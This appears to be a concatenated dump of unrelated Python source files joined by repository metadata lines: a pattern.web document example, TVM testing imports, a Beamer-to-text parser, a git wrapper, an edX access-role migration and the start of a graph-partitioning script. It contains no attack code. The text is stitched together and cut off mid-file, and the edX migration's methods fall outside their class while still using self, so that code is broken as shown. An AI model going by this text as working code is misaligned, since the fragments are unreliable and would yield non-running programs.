#from pattern.web import Wikipedia
#
#w = Wikipedia()
#for q in (
#  "badger", "bear", "dog", "dolphin", "lion", "parakeet",
#  "rabbit", "shark", "sparrow", "tiger", "wolf"):
#    s = w.search(q, cached=True)
#    s = s.plaintext()
#    print os.path.join("corpus2", q+".txt")
#    f = codecs.open(os.path.join("corpus2", q+".txt"), "w", encoding="utf-8")
#    f.write(s)
#    f.close()

# Loading a document from a text file:
f = os.path.join(os.path.dirname(__file__), "corpus", "wolf.txt")
s = codecs.open(f, encoding="utf-8").read()
document = Document(s, name="wolf", stemmer=PORTER)
print document
print document.keywords(top=10) # (weight, feature)-items.
print

# Same document, using lemmatization instead of stemming (slower):
document = Document(s, name="wolf", stemmer=LEMMA)
print document
print document.keywords(top=10)
print

# In summary, a document is a bag-of-words representation of a text.
# Bag-of-words means that the word order is discarded.
# The dictionary of words (features) and their normalized word count (weights)
# is also called the document vector:
document = Document("a black cat and a white cat", stopwords=True)
print document.words
print document.vector.features
for feature, weight in document.vector.items():
    print feature, weight

# Document vectors can be bundled into a Model (next example).
Huyuwei/tvm | topi/python/topi/testing/__init__.py | 1 | 1285 | """TOPI Testing Util functions.
Used to verify the correctness of operators in TOPI .
"""
from __future__ import absolute_import as _abs
from .conv2d_hwcn_python import conv2d_hwcn_python
from .conv2d_nchw_python import conv2d_nchw_python
from .conv2d_nhwc_python import conv2d_nhwc_python
from .conv2d_transpose_nchw_python import conv2d_transpose_nchw_python
from .deformable_conv2d_nchw_python import deformable_conv2d_nchw_python
from .depthwise_conv2d_python import depthwise_conv2d_python_nchw, depthwise_conv2d_python_nhwc
from .dilate_python import dilate_python
from .softmax_python import softmax_python, log_softmax_python
from .upsampling_python import upsampling_python
from .bilinear_resize_python import bilinear_resize_python
from .reorg_python import reorg_python
from .roi_align_python import roi_align_nchw_python
from .roi_pool_python import roi_pool_nchw_python
from .lrn_python import lrn_python
from .l2_normalize_python import l2_normalize_python
from .gather_nd_python import gather_nd_python
from .strided_slice_python import strided_slice_python
from .batch_matmul import batch_matmul
from .slice_axis_python import slice_axis_python
from .sequence_mask_python import sequence_mask
from .pool_grad_python import pool_grad_nchw
from .one_hot import one_hot
| apache-2.0 |
Codophile1/exide | exide/beamer_parser.py | 1 | 10947 | #!/usr/bin/python
#-*- coding: utf-8 -*-
import re, os
from datatypes.Section import Section
from datatypes.Slide import Slide
from datatypes.Presentation import Presentation
from parser_utils import get_named_entities, get_urls, get_slide_type
def parse_beamer(path):
    """
    Transform a beamer tex file into a |Presentation| object
    :param path: Path of the beamer file
    :type path: string
    :return: |Presentation|
    :raises Exception: if the file contains no frame
    """
    with open(path, 'r') as content_file:
        content = content_file.read()
    # A valid Beamer document must contain at least one frame.  Previous
    # revisions tested ``len(re.split(...)) == 0`` (twice), which can never
    # be true because re.split always returns at least one element.
    if len(re.findall(r'\\begin{frame}', content)) == 0:
        raise Exception("Invalid LaTeX Beamer file. No frame found.")
    # Title and author default to "Untitled" when the commands are absent.
    titles = re.findall(r'\\title\[?.*\]?[\n]?\{(.*)\}', content, re.M)
    title = titles[0] if titles else "Untitled"
    authors = re.findall(r'\\author\[?.*\]?[\n]?\{(.*)\}', content, re.M)
    author = detex(authors[0]) if authors else "Untitled"

    pres = Presentation()
    pres.title = title
    pres.author = author
    pres.root_section = Section(title)
    # The title page is represented as a "sectionheader" slide with id 1.
    title_slide = Slide()
    title_slide.title = title
    title_slide.type = "sectionheader"
    title_slide.id = 1
    pres.root_section.subelements.append(title_slide)
    # Remaining slides are numbered from 2 onwards.
    pres.root_section.subelements += parse_sections(content, 2)
    return pres
def parse_slides(latex, starting_index=1):
    """
    Extract slides from tex file.
    :param latex: LaTeX source to scan for frames
    :param starting_index: id assigned to the first extracted slide
    :return: list of |Slide| objects
    """
    index = starting_index
    slides = []
    # Element 0 of the split is everything before the first frame; skipped.
    slides_contents = re.compile(r'\\begin{frame}').split(latex)
    for i in range(1, len(slides_contents)):
        # Frames containing \titlepage are skipped here (the title page is
        # built separately as the first slide of the presentation).
        if len(re.findall(r'\\titlepage', slides_contents[i])) == 0:
            current_slide = Slide()
            current_slide.title = get_frame_title(slides_contents[i])
            current_slide.text = detex(slides_contents[i])
            current_slide.id = index
            current_slide.urls = get_urls(current_slide.text)
            current_slide.type = get_slide_type(current_slide)
            # Non-ASCII bytes are dropped before named-entity recognition.
            current_slide.named_entities = get_named_entities(current_slide.text.decode('ascii', "ignore"))
            current_slide.emphasized_text = get_emphasized_terms(slides_contents[i])
            index+=1
            slides.append(current_slide)
    return slides
def get_frame_title(latex):
    """
    Extract the title from slide tex source.
    :param latex: string
    :return: String
    """
    # A frame title either immediately follows \begin{frame} as {...} or is
    # given by an explicit \frametitle{...} command; otherwise "Untitled".
    if re.match(r'^{.*}', latex):
        return re.findall(r'\{(.*?)\}', latex, re.S)[0]
    frametitles = re.findall(r'\\frametitle{(.*?)}', latex, re.S)
    if frametitles:
        return frametitles[0]
    return "Untitled"
def parse_subsections(latex, starting_index=1):
    """
    Parse subsections.
    :param latex: LaTeX source of one section (or preamble)
    :param starting_index: id assigned to the first slide encountered
    :return: list of |Section| objects
    """
    index = starting_index
    subsections = []
    subsections_titles = re.findall(r'\\subsection{(.*?)\}', latex, re.S)
    subsections_contents = re.compile(r'\\subsection{.*}').split(latex)
    # Slides appearing before the first \subsection belong directly to the
    # parent element.
    subsections += parse_slides(subsections_contents[0], index)
    index += len(subsections)
    for i in range(1, len(subsections_contents)):
        # titles[i-1] pairs with contents[i]: the split's first chunk has
        # no preceding \subsection command.
        current_section = Section(subsections_titles[i-1])
        current_section.subelements += parse_slides(subsections_contents[i], index)
        index += len(current_section.subelements)
        subsections.append(current_section)
    return subsections
def parse_sections(latex, starting_index=1):
    """
    Parse sections.
    :param latex: string (full document body)
    :param starting_index: int, id assigned to the first slide encountered
    :return: list of |Section| objects
    """
    index = starting_index
    sections = []
    sections_titles = re.findall(r'\\section{(.*?)\}', latex, re.S)
    sections_contents = re.compile(r'\\section{.*}').split(latex)
    # Content before the first \section is parsed as top-level subsections.
    sections += parse_subsections(sections_contents[0], index)
    index += len(sections)
    for i in range(1, len(sections_contents)):
        # titles[i-1] pairs with contents[i]: the split's first chunk has
        # no preceding \section command.
        current_section = Section(sections_titles[i-1])
        current_section.subelements += parse_subsections(sections_contents[i], index)
        index += len(current_section.subelements)
        sections.append(current_section)
    return sections
def get_emphasized_terms(latex):
    """
    Return emphasized terms of the given latex string.
    :param latex: String
    :return: list of Strings
    """
    # Collect the contents of every \emph{...} command; the non-greedy
    # group yields exactly one term per command.
    emph_pattern = re.compile(r'\\emph{(.*?)\}', re.S)
    return emph_pattern.findall(latex)
def applyRegexps(text, listRegExp):
    """ Applies successively many regexps to a text"""
    # Each rule is a dict with a 'left' pattern and a 'right' replacement;
    # rules are applied in order, each on the output of the previous one.
    for rule in listRegExp:
        text = re.sub(rule['left'], rule['right'], text)
    return text
def detex(latexText):
    """
    Transform a latex text into a simple text

    The rules below are order-dependent: header stripping, comment removal,
    tag reduction, highlighting, tag removal and symbol replacement must run
    in this sequence.
    Credits : Gilles Bertrand http://www.gilles-bertrand.com/2012/11/a-simple-detex-function-in-python.html
    """

    # initialization
    regexps = []
    text = latexText

    # remove all the contents of the header, ie everything before the first occurence of "\begin{document}"
    text = re.sub(r"(?s).*?(\\begin\{document\})", "", text, 1)

    # remove comments
    regexps.append({r'left': r'([^\\])%.*', 'right': r'\1'})
    text = applyRegexps(text, regexps)
    regexps = []

    # - replace some LaTeX commands by the contents inside curly rackets
    to_reduce = [r'\\emph', r'\\textbf', r'\\textit', r'\\text', r'\\IEEEauthorblockA', r'\\IEEEauthorblockN',
                 r'\\author', r'\\caption', r'\\author', r'\\thanks']
    for tag in to_reduce:
        regexps.append({'left': tag + r'\{([^\}\{]*)\}', 'right': r'\1'})
    text = applyRegexps(text, regexps)
    regexps = []

    """
    _     _       _     _ _       _     _
    | |__ (_) __ _| (_) __ _| |__ | |_
    | '_ \| |/ _` | | |/ _` | '_ \| __|
    | | | | | (_| | | | (_| | | | | |_
    |_| |_|_|\__, |_|_|\__, |_| |_|\__|
    |___/    |___/
    """
    # - replace some LaTeX commands by the contents inside curly brackets and highlight these contents
    to_highlight = [r'\\part[\*]*', r'\\chapter[\*]*', r'\\section[\*]*', r'\\subsection[\*]*', r'\\subsubsection[\*]*',
                    r'\\paragraph[\*]*'];
    # highlightment pattern: #--content--#
    for tag in to_highlight:
        regexps.append({'left': tag + r'\{([^\}\{]*)\}', 'right': r'\n#--\1--#\n'})
    # highlightment pattern: [content]
    to_highlight = [r'\\title', r'\\author', r'\\thanks', r'\\cite', r'\\ref'];
    for tag in to_highlight:
        regexps.append({'left': tag + r'\{([^\}\{]*)\}', 'right': r'[\1]'})
    text = applyRegexps(text, regexps)
    regexps = []

    """
    _ __ ___ _ __ ___   _____   _____
    | '__/ _ \ '_ ` _ \ / _ \ \ / / _ \
    | | |  __/ | | | | | (_) \ V /  __/
    |_|  \___|_| |_| |_|\___/ \_/ \___|
    """
    # remove LaTeX tags
    # - remove completely some LaTeX commands that take arguments
    to_remove = [r'\\maketitle', r'\\footnote', r'\\centering', r'\\IEEEpeerreviewmaketitle', r'\\includegraphics',
                 r'\\IEEEauthorrefmark', r'\\label', r'\\begin', r'\\end', r'\\big', r'\\right', r'\\left',
                 r'\\documentclass', r'\\usepackage', r'\\bibliographystyle', r'\\bibliography', r'\\cline',
                 r'\\multicolumn', r'\\pause']
    # replace tag with options and argument by a single space
    for tag in to_remove:
        regexps.append({'left': tag + r'(\[[^\]]*\])*(\{[^\}\{]*\})*', 'right': r' '})
        # regexps.append({'left':tag+r'\{[^\}\{]*\}\[[^\]\[]*\]', 'right':r' '})
    text = applyRegexps(text, regexps)
    regexps = []

    """
    _
    _ __ ___ _ __ | | __ _  ___ ___
    | '__/ _ \ '_ \| |/ _` |/ __/ _ \
    | | |  __/ |_) | | (_| | (_|  __/
    |_|  \___| .__/|_|\__,_|\___\___|
    |_|
    """
    # - replace some LaTeX commands by the contents inside curly rackets
    # replace some symbols by their ascii equivalent
    # - common symbols
    regexps.append({'left': r'\\eg(\{\})* *', 'right': r'e.g., '})
    regexps.append({'left': r'\\ldots', 'right': r'...'})
    regexps.append({'left': r'\\Rightarrow', 'right': r'=>'})
    regexps.append({'left': r'\\rightarrow', 'right': r'->'})
    regexps.append({'left': r'\\le', 'right': r'<='})
    regexps.append({'left': r'\\ge', 'right': r'>'})
    regexps.append({'left': r'\\_', 'right': r'_'})
    regexps.append({'left': r'\\\\', 'right': r'\n'})
    regexps.append({'left': r'~', 'right': r' '})
    regexps.append({'left': r'\\&', 'right': r'&'})
    regexps.append({'left': r'\\%', 'right': r'%'})
    regexps.append({'left': r'([^\\])&', 'right': r'\1\t'})
    regexps.append({'left': r'\\item', 'right': r'\t- '})
    regexps.append({'left': r'\\\hline[ \t]*\\hline', 'right': r'============================================='})
    regexps.append({'left': r'[ \t]*\\hline', 'right': r'_____________________________________________'})
    # - special letters
    regexps.append({'left': r'\\\'{?\{e\}}?', 'right': r'é'})
    regexps.append({'left': r'\\`{?\{a\}}?', 'right': r'à'})
    regexps.append({'left': r'\\\'{?\{o\}}?', 'right': r'ó'})
    regexps.append({'left': r'\\\'{?\{a\}}?', 'right': r'á'})
    # keep untouched the contents of the equations
    regexps.append({'left': r'\$(.)\$', 'right': r'\1'})
    regexps.append({'left': r'\$([^\$]*)\$', 'right': r'\1'})
    # remove the equation symbols ($)
    regexps.append({'left': r'([^\\])\$', 'right': r'\1'})
    # correct spacing problems
    regexps.append({'left': r' +,', 'right': r','})
    regexps.append({'left': r' +', 'right': r' '})
    regexps.append({'left': r' +\)', 'right': r'\)'})
    regexps.append({'left': r'\( +', 'right': r'\('})
    regexps.append({'left': r' +\.', 'right': r'\.'})
    # remove lonely curly brackets
    regexps.append({'left': r'^([^\{]*)\}', 'right': r'\1'})
    regexps.append({'left': r'([^\\])\{([^\}]*)\}', 'right': r'\1\2'})
    regexps.append({'left': r'\\\{', 'right': r'\{'})
    regexps.append({'left': r'\\\}', 'right': r'\}'})
    # strip white space characters at end of line
    regexps.append({'left': r'[ \t]*\n', 'right': r'\n'})
    # remove consecutive blank lines
    regexps.append({'left': r'([ \t]*\n){3,}', 'right': r'\n'})
    # apply all those regexps
    text = applyRegexps(text, regexps)
    regexps = []

    # return the modified text
    return text
if __name__ == '__main__':
    # Manual smoke test (Python 2): parse the bundled sample presentation
    # and print its metadata and outline.
    __location__ = os.path.realpath(os.path.join(os.getcwd(), os.path.dirname(__file__)))+"/tests/data/beamer"
    pres = parse_beamer(os.path.join(__location__, "simple_beamer"))
    print pres.title
    print pres.author
    print pres.root_section.outline
mwilliamson/mayo | mayo/git.py | 1 | 1623 | from .util import run
class Git(object):
    """Backend descriptor for git version control."""

    name = "git"
    directory_name = ".git"
    default_branch = "origin/master"

    def clone(self, repository_uri, local_path):
        """Clone repository_uri into local_path and return a repository handle."""
        _git(["clone", repository_uri, local_path])
        return GitRepository(local_path)

    def local_repo(self, working_directory):
        """Wrap an existing checkout located at working_directory."""
        return GitRepository(working_directory)
class GitRepository(object):
    """Operations on a local git checkout."""

    type = Git.name

    def __init__(self, working_directory):
        self.working_directory = working_directory

    def update(self):
        # Fetch new revisions from the remote.
        self._git(["fetch"])

    def checkout_revision(self, revision):
        # If a remote branch contains/matches the revision, check out the
        # "origin/"-prefixed ref instead so the freshly fetched state is used.
        if self._git(["branch", "-r", "--contains", "origin/" + revision], allow_error=True).return_code == 0:
            revision = "origin/" + revision
        self._git(["checkout", revision])

    def remote_repo_uri(self):
        """Return the URI configured for the "origin" remote."""
        return self._git(["config", "remote.origin.url"]).output.strip()

    def head_revision(self):
        """Return the commit hash of HEAD."""
        return self._git(["rev-parse", "HEAD"]).output.strip()

    def find_ignored_files(self):
        """Return the paths git reports as ignored ("!!" porcelain entries)."""
        # -z uses NUL separators so unusual path characters survive parsing.
        result = self._git(["status", "-z", "--ignored"], decode=False)
        lines = result.output.split(b"\0")
        ignore_prefix = b"!! "
        return [
            line[len(ignore_prefix):].decode("utf8")
            for line in lines
            if line.startswith(ignore_prefix)
        ]

    def _git(self, git_command, **kwargs):
        # Run git with this repository's working directory as cwd.
        return _git(git_command, cwd=self.working_directory, **kwargs)
def _git(git_command, *args, **kwargs):
    """Prepend the git executable and delegate to the generic runner."""
    return run(["git"] + git_command, *args, **kwargs)
| bsd-2-clause |
eestay/edx-platform | common/djangoapps/student/migrations/0036_access_roles_orgless.py | 125 | 17964 | # -*- coding: utf-8 -*-
from south.v2 import DataMigration
from xmodule.modulestore.django import modulestore
import re
from opaque_keys.edx.locations import SlashSeparatedCourseKey
import logging
from django.db.models.query_utils import Q
from django.db.utils import IntegrityError
from xmodule.modulestore import ModuleStoreEnum
import bson.son
from xmodule.modulestore.mixed import MixedModuleStore
import itertools
log = logging.getLogger(__name__)
class Migration(DataMigration):
"""
Converts course_creator, instructor_, staff_, and betatestuser_ to new table
"""
    # Matches legacy group names such as "staff_<course>",
    # "instructor_<course>" or "beta_testers_<course>".
    GROUP_ENTRY_RE = re.compile(r'(?P<role_id>staff|instructor|beta_testers)_(?P<course_id_string>\S*)')

    def forwards(self, orm):
        """
        Converts group table entries for write access and beta_test roles to course access roles table.
        """
        store = modulestore()
        # Resolve the concrete mongo / xml stores behind a possibly mixed store.
        if isinstance(store, MixedModuleStore):
            self.mongostore = modulestore()._get_modulestore_by_type(ModuleStoreEnum.Type.mongo)
            self.xmlstore = modulestore()._get_modulestore_by_type(ModuleStoreEnum.Type.xml)
        elif store.get_modulestore_type() == ModuleStoreEnum.Type.mongo:
            self.mongostore = store
            self.xmlstore = None
        elif store.get_modulestore_type() == ModuleStoreEnum.Type.xml:
            self.mongostore = None
            self.xmlstore = store
        else:
            # Unknown store type: nothing to migrate against.
            return

        query = Q(name__startswith='staff') | Q(name__startswith='instructor') | Q(name__startswith='beta_testers')
        # Only "orgless" entries (no "/" in the group name) are handled here.
        for group in orm['auth.Group'].objects.filter(query).exclude(name__contains="/").all():

            def _migrate_users(correct_course_key, role):
                """
                Get all the users from the old group and migrate to this course key in the new table
                """
                log.info(
                    u'Giving %s users access to %s',
                    group.name, correct_course_key
                )
                for user in orm['auth.user'].objects.filter(groups=group).all():
                    entry = orm['student.courseaccessrole'](
                        role=role,
                        user=user,
                        org=correct_course_key.org,
                        course_id=correct_course_key,
                    )
                    try:
                        entry.save()
                    except IntegrityError:
                        # Row already exists: the migration is idempotent.
                        pass

            parsed_entry = self.GROUP_ENTRY_RE.search(group.name)
            if parsed_entry is None:
                log.warn('Ignoring an unexpected unparsable entry %s', group.name)
                continue
            role = parsed_entry.group('role_id')
            course_id_string = parsed_entry.group('course_id_string')
            # if it's a full course_id w/ dots, ignore it
            if u'/' not in course_id_string and not self.dotted_course(course_id_string):
                # check new table to see if it's been added as org permission
                if not orm['student.courseaccessrole'].objects.filter(
                    role=role,
                    org__iexact=course_id_string,
                ).exists():
                    # old auth was of form role_coursenum. Grant access to all such courses wildcarding org and run
                    # look in xml for matching courses
                    if self.xmlstore is not None:
                        for course in self.xmlstore.get_courses():
                            if course_id_string == course.id.course.lower():
                                _migrate_users(course.id, role)

                    if self.mongostore is not None:
                        # Case-insensitive exact match on the course number.
                        mongo_query = re.compile(ur'^{}$'.format(course_id_string), re.IGNORECASE)
                        for mongo_entry in self.mongostore.collection.find(
                            {"_id.category": "course", "_id.course": mongo_query}, fields=["_id"]
                        ):
                            mongo_id_dict = mongo_entry['_id']
                            course_key = SlashSeparatedCourseKey(
                                mongo_id_dict['org'], mongo_id_dict['course'], mongo_id_dict['name']
                            )
                            _migrate_users(course_key, role)
def dotted_course(self, parts):
    """
    Look for all possible org/course/run patterns from a possibly dotted source.

    Tries every pair of cut points: everything before the first cut is the
    org, between the cuts is the course, and after the second cut is the run.
    Returns the first course key that actually exists in a store, else False.

    NOTE(review): the caller in forwards() passes ``course_id_string`` (a str),
    in which case ``parts[:org_stop]`` slices characters and ``'.'.join`` puts
    dots between single characters -- confirm the intended input is a
    pre-split list of name components.
    """
    for org_stop, course_stop in itertools.combinations(range(1, len(parts)), 2):
        org = '.'.join(parts[:org_stop])
        course = '.'.join(parts[org_stop:course_stop])
        run = '.'.join(parts[course_stop:])
        course_key = SlashSeparatedCourseKey(org, course, run)
        # Validate the candidate key against the actual stores.
        correct_course_key = self._map_downcased_ssck(course_key)
        if correct_course_key is not None:
            return correct_course_key
    return False
def _map_downcased_ssck(self, downcased_ssck):
    """
    Get the normal cased version of this downcased slash sep course key.

    Looks the course up case-insensitively, first in the mongo store (if
    configured) and then in the xml store.  Returns None if no matching
    course exists in either store.
    """
    if self.mongostore is not None:
        # Case-insensitive regex match on org/course/run in the mongo _id.
        course_son = bson.son.SON([
            ('_id.tag', 'i4x'),
            ('_id.org', re.compile(ur'^{}$'.format(downcased_ssck.org), re.IGNORECASE | re.UNICODE)),
            ('_id.course', re.compile(ur'^{}$'.format(downcased_ssck.course), re.IGNORECASE | re.UNICODE)),
            ('_id.category', 'course'),
            ('_id.name', re.compile(ur'^{}$'.format(downcased_ssck.run), re.IGNORECASE | re.UNICODE)),
        ])
        entry = self.mongostore.collection.find_one(course_son)
        if entry:
            idpart = entry['_id']
            return SlashSeparatedCourseKey(idpart['org'], idpart['course'], idpart['name'])
    if self.xmlstore is not None:
        # Linear scan of the xml store, comparing each component lowercased.
        for course in self.xmlstore.get_courses():
            if (
                course.id.org.lower() == downcased_ssck.org and course.id.course.lower() == downcased_ssck.course
                and course.id.run.lower() == downcased_ssck.run
            ):
                return course.id
    return None
def backwards(self, orm):
    """No obvious way to reverse just this migration, but reversing 0035 will reverse this."""
    pass
# South freeze: auto-generated snapshot of the model schemas this migration
# operates on.  Do not edit by hand.
models = {
    'auth.group': {
        'Meta': {'object_name': 'Group'},
        'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
        'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
        'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
    },
    'auth.permission': {
        'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
        'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
        'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
        'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
        'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
    },
    'auth.user': {
        'Meta': {'object_name': 'User'},
        'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
        'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
        'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
        'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
        'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
        'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
        'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
        'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
        'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
        'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
        'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
        'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
        'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
    },
    'contenttypes.contenttype': {
        'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
        'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
        'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
        'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
        'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
    },
    'student.anonymoususerid': {
        'Meta': {'object_name': 'AnonymousUserId'},
        'anonymous_user_id': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32'}),
        'course_id': ('xmodule_django.models.CourseKeyField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'}),
        'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
        'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
    },
    'student.courseaccessrole': {
        'Meta': {'unique_together': "(('user', 'org', 'course_id', 'role'),)", 'object_name': 'CourseAccessRole'},
        'course_id': ('xmodule_django.models.CourseKeyField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'}),
        'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
        'org': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '64', 'blank': 'True'}),
        'role': ('django.db.models.fields.CharField', [], {'max_length': '64', 'db_index': 'True'}),
        'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
    },
    'student.courseenrollment': {
        'Meta': {'ordering': "('user', 'course_id')", 'unique_together': "(('user', 'course_id'),)", 'object_name': 'CourseEnrollment'},
        'course_id': ('xmodule_django.models.CourseKeyField', [], {'max_length': '255', 'db_index': 'True'}),
        'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'null': 'True', 'db_index': 'True', 'blank': 'True'}),
        'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
        'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
        'mode': ('django.db.models.fields.CharField', [], {'default': "'honor'", 'max_length': '100'}),
        'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
    },
    'student.courseenrollmentallowed': {
        'Meta': {'unique_together': "(('email', 'course_id'),)", 'object_name': 'CourseEnrollmentAllowed'},
        'auto_enroll': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
        'course_id': ('xmodule_django.models.CourseKeyField', [], {'max_length': '255', 'db_index': 'True'}),
        'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'null': 'True', 'db_index': 'True', 'blank': 'True'}),
        'email': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
        'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
    },
    'student.loginfailures': {
        'Meta': {'object_name': 'LoginFailures'},
        'failure_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
        'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
        'lockout_until': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
        'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
    },
    'student.passwordhistory': {
        'Meta': {'object_name': 'PasswordHistory'},
        'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
        'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
        'time_set': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
        'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
    },
    'student.pendingemailchange': {
        'Meta': {'object_name': 'PendingEmailChange'},
        'activation_key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32', 'db_index': 'True'}),
        'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
        'new_email': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'}),
        'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True'})
    },
    'student.pendingnamechange': {
        'Meta': {'object_name': 'PendingNameChange'},
        'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
        'new_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
        'rationale': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'blank': 'True'}),
        'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True'})
    },
    'student.registration': {
        'Meta': {'object_name': 'Registration', 'db_table': "'auth_registration'"},
        'activation_key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32', 'db_index': 'True'}),
        'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
        'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'unique': 'True'})
    },
    'student.userprofile': {
        'Meta': {'object_name': 'UserProfile', 'db_table': "'auth_userprofile'"},
        'allow_certificate': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
        'city': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
        'country': ('django_countries.fields.CountryField', [], {'max_length': '2', 'null': 'True', 'blank': 'True'}),
        'courseware': ('django.db.models.fields.CharField', [], {'default': "'course.xml'", 'max_length': '255', 'blank': 'True'}),
        'gender': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '6', 'null': 'True', 'blank': 'True'}),
        'goals': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
        'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
        'language': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'}),
        'level_of_education': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '6', 'null': 'True', 'blank': 'True'}),
        'location': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'}),
        'mailing_address': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
        'meta': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
        'name': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'}),
        'user': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'profile'", 'unique': 'True', 'to': "orm['auth.User']"}),
        'year_of_birth': ('django.db.models.fields.IntegerField', [], {'db_index': 'True', 'null': 'True', 'blank': 'True'})
    },
    'student.userstanding': {
        'Meta': {'object_name': 'UserStanding'},
        'account_status': ('django.db.models.fields.CharField', [], {'max_length': '31', 'blank': 'True'}),
        'changed_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'blank': 'True'}),
        'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
        'standing_last_changed_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
        'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'standing'", 'unique': 'True', 'to': "orm['auth.User']"})
    },
    'student.usertestgroup': {
        'Meta': {'object_name': 'UserTestGroup'},
        'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
        'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
        'name': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
        'users': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.User']", 'db_index': 'True', 'symmetrical': 'False'})
    }
}

complete_apps = ['student']
symmetrical = True
| agpl-3.0 |
Determinant/weaver | tests/static_partitioning/stream_partition.py | 3 | 3924 | #! /usr/bin/env python
import sys
import random
import math
from sets import Set
# Streaming partitioner configuration and shared state.
# Adds a node attribute of which shard the node should be placed on.
num_shards = 8                   # number of partitions to produce
num_runs = 1                     # re-streaming passes over the node set
capacity = 84000/num_shards      # per-shard node budget (capacity constant)
assignments = dict()             # node id -> shard id
shard_sizes = [0] * num_shards   # current node count per shard
